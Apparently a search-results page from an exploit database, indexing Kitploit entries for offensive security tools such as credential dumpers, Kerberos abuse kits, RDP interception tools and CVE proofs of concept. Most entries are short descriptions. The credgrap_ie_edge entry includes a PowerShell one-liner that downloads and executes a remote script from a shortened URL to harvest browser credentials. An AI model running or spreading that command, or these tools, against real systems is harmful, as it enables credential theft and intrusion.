Lucene search
+L

169 matches found

Kitploit
Kitploit
added 2026/09/17 4:06 p.m.11 views

Internal-Monologue

Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS Introduction Mimikatz, developed by Benjamin Delpy @gentilkiwi, is a well-regarded post-exploitation tool, which allows adversaries to extract plain text passwords, NTLM hashes and Kerberos tickets from memory, as well as...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/17 3:25 p.m.14 views

Rubeus

Rubeus Rubeus is a C toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpy's Kekeo project CC BY-NC-SA 4.0 license and Vincent LE TOUX's MakeMeEnterpriseAdmin project GPL v3.0 license. Full credit goes to Benjamin and Vincent for working out the hard component...

5.9AI score
SaveExploits0References11
Kitploit
Kitploit
added 2026/09/17 12:37 p.m.12 views

CVE-2023-27532

CVE-2023-27532 POC for CVE-2023-27532 affecting Veeam Backup and Replication Technical Analysis A technical root cause analysis of the vulnerability can be found on our blog: https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive Summary This POC abuses an unsecured API...

7.5CVSS8.4AI score0.7761EPSS
SaveExploits4
Kitploit
Kitploit
added 2026/09/17 10:38 a.m.10 views

CVE-2024-1698-Exploit

CVE-2024-1698 Exploit Script - Wordpress NotificationX = 2.8.2 - SQL Injection This is an exploit script to find out wordpress admin's username and password hash by exploiting CVE-2024-1698. This Python script is intended for educational purposes only. It demonstrates a proof of concept for...

9.8CVSS8.2AI score0.77585EPSS
SaveExploits3References1
Kitploit
Kitploit
added 2026/09/17 10:11 a.m.13 views

VeeamDumper-BOF

Veeam Dumper BOF A credential extraction BOF for Veeam Backup and Replication and Veeam One by Stephen Munro and Logan Kroeger from @MWRCyberSec. The BOF needs to be executed in an Admin beacon on either a Veeam One or Veeam Backup and Replication server and supports Cobalt Strike and Outflank C2...

5.9AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/17 9:46 a.m.16 views

PCredz

PCredz 2.1.0 PCredz extracts credentials and authentication tokens from network traffic PCAP files or live capture. Features Supported Protocols Extract credentials from both IPv4 and IPv6 traffic: NTLM : NTLMv1/v2 hashes from HTTP, SMB, LDAP, MSSQL, DCE-RPC, and more Kerberos : AS-REQ Pre-Auth...

6AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/17 9:20 a.m.12 views

BlueFish

BlueFish BlueFish is a Python-based automation tool designed to simplify the analysis of PCAP Packet Capture files. It leverages the power of Wireshark's command-line tool, tshark, to extract valuable information from network captures. With BlueFish, you can quickly identify potential login...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/17 9:13 a.m.17 views

Seth

Seth Seth is a tool written in Python and Bash to MitM RDP connections by attempting to downgrade the connection in order to extract clear text credentials. It was developed to raise awareness and educate about the importance of properly configured RDP connections in the context of pentests,...

6.3AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/17 9:13 a.m.14 views

SessionGopher

Copyright 2017 FireEye, created by Brandon Arvanaghi @arvanaghi Licensed under the Apache License, Version 2.0 the "License"; you may not use this file except in compliance with the License. You may obtain a copy of the License at root@kitploit: http://www.apache.org/licenses/LICENSE-2.0 Unless...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/17 8:49 a.m.17 views

VMkatz

VMkatz Too Big to Steal You are three weeks into a red team engagement. Your traffic crawls through a VPN, then bounces across four SOCKS proxies chained through compromised jump boxes before it touches the target network. Every packet takes the scenic route. After days of lateral movement you la...

6.1AI score
SaveExploits0References12
Kitploit
Kitploit
added 2026/09/17 8:37 a.m.7 views

CVE-2019-9053-python3-remastered

CVE-2019-9053-python3-remastered The script has been remastered by Teymur Novruzov to ensure compatibility with Python 3. This tool is intended for educational purposes only. Unauthorized use of this tool on any system or network without permission is illegal. The author is not responsible for an...

8.1CVSS7.4AI score0.68581EPSS
SaveExploits38
Kitploit
Kitploit
added 2026/09/17 7:37 a.m.7 views

RdpThief

RdpThief RdpThief by itself is a standalone DLL that when injected in the mstsc.exe process, will perform API hooking, extract the clear-text credentials and save them to a file. An aggressor script accompanies it, which is responsible for managing the state, monitoring for new processes and...

5.7AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/17 3:20 a.m.10 views

ThunderCloud

ThunderCloud Cloud Exploit Framework Usage root@kitploit: python3 tc.py -h | | | | | / | | | | | | | | | | | | | | | | | | | ' | | | | ' \ / |/ \ '| | | |/ | | | |/ | | | | | | | || | | | | | | / | | || | | || | | | / || ||,|| ||,||| ||/ ,|,| usage: tc.py -h -ce COGNITOENDPOINT -reg...

6AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/17 3:02 a.m.13 views

credgrap_ie_edge

credgrapieedge Content: Extract stored credentials from Internet Explorer and Edge Author: Florian Hansemann | @HanseSecure | https://hansesecure.de Date: 04/2018 Usage powershell -nop -exec bypass -c "IEX New-Object Net.WebClient.DownloadString'http://bit.ly/2K75g15'" Recommendation Powershell...

5.8AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/17 3:02 a.m.13 views

lsassy

lsassy Python tool to remotely extract credentials on a set of hosts. This blog post explains how it works. This tool uses impacket project to remotely read necessary bytes in lsass dump and pypykatz to extract credentials...

5.9AI score
SaveExploits0References3
Kitploit
Kitploit
added 2026/09/17 2:58 a.m.10 views

mimipenguin

MimiPenguin 2.0 現在のLinuxデスクトップユーザーのログインパスワードをダンプするツール。人気のWindowsツールmimikatzの背後にあるアイデアを応用したものです。これは CVE-2018-20781 https://vulners.com/cve/CVE-2018-20781 に割り当てられました。興味深い事実として、GNOME Keyring 3.27.2 以降も修正されておらず、3.28.0.2-1ubuntu1.18.04.1 でもまだ動作します。 詳細...

7.8CVSS7.6AI score0.01483EPSS
SaveExploits1References3
Kitploit
Kitploit
added 2026/09/17 1:47 a.m.10 views

go-secdump

go-secdump 描述 go-secdump 是一个用于从 SAM 注册表配置单元远程提取哈希值以及从 SECURITY 配置单元提取 LSA 机密和缓存的哈希值的工具,无需远程代理,也无需接触磁盘。 该工具基于 go-smb 库构建,并利用它与 Windows 远程注册表通信,直接从内存中检索注册表键。 该工具的构建是为了学习经验,并作为概念验证,证明应该能够远程从 SAM 配置单元检索 NT 哈希值、LSA 机密以及域缓存凭据,而无需先将注册表配置单元保存到磁盘,然后再在本地解析它们。 需要克服的主要问题是,SAM 和 SECURITY 配置单元仅可由 NT...

6AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/17 1:30 a.m.13 views

CVE-2026-27470

⚠️ YASAL UYARI / LEGAL DISCLAIMER Bu araç yalnızca eğitim amaçlı ve yazılı izin alınmış güvenlik testleri için geliştirilmiştir. Sahip olmadığınız veya test etmek için açık yazılı izniniz olmayan sistemlere karşı kullanılması yasadışıdır. Yetkisiz erişim, birçok ülkede ağır cezai yaptırımlara...

8.8CVSS6AI score0.0048EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/17 12:41 a.m.9 views

CVE-2024-1698-NotificationX-WordPress-Plugin-SQL-Injection-to-Admin-Credential-Extraction

CVE-2024-1698 – NotificationX WordPress Plugin SQL Injection Time‑Based Blind Unauthenticated Time‑Based Blind SQL Injection → Extract admin username & password hash from WordPress. 🧠 Vulnerability Overview NotificationX versions 2.8.2 and below suffer from improper input sanitization in the type...

9.8CVSS8.4AI score0.77585EPSS
SaveExploits3
Kitploit
Kitploit
added 2026/09/17 12:15 a.m.6 views

PyHook

PyHook PyHook is the python implementation of my SharpHook project, It uses various API hooks in order to give us the desired credentials. PyHook Uses frida to inject it's dependencies into the target process Supported Processes...

5.8AI score
SaveExploits0References1
Rows per page
Query Builder